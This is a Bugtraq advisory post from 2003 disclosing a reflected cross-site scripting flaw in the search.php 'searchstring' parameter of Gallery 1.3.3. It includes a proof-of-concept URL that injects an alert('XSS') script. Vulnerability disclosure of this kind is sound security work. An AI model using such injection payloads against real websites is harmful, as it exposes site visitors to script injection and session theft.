Bugtraq mailing list archives

Gallery v1.3.3 Cross Site Scripting Vulnerabillity

From: "The-Insider" <nuritrv18 () bezeqint net>
Date: Tue, 30 Dec 2003 15:29:49 +0200

#######################################################################

Application:    Gallery
Vendors:
http://gallery.sourceforge.net
http://gallery.menalto.com
Versions:        <= 1.3.3
Platforms:       Windows/Unix
Bug:                 Cross Site Scripting Vulnerabillity
Risk:                Low
Exploitation:   Remote with browser
Date:               30 Dec 2003
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider () mail com
web:                http://theinsider.deep-ice.com

#######################################################################

1) Introduction
2) Bug
3) The Code

#######################################################################

===============
1) Introduction
===============


Gallery 1.3.3 is an automated php Gallery engine. It is quite secure, and
very effective as a
web gallery.

#######################################################################

======
2) Bug
======

When the webserver hosting gallery 1.3.3 recieves a "GET
/<galleryfolder>/search.php"
it reffers to search.php as it should. However when searching
"<script>alert('XSS')</script>"
or requests "GET
/<galleryfolder>/search.php?searchstring=<script>alert('XSS')</script>"
the server allows an attacker so inject & execute scripts.

#######################################################################

===========
3) The Code
===========

http://<host>/<galleryfolder>/search.php?searchstring=<script>alert('XSS')</
script>

#######################################################################

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."

Current thread:

Gallery v1.3.3 Cross Site Scripting Vulnerabillity The-Insider (Dec 30)
- Re: Gallery v1.3.3 Cross Site Scripting Vulnerabillity Bharat Mediratta (Dec 30)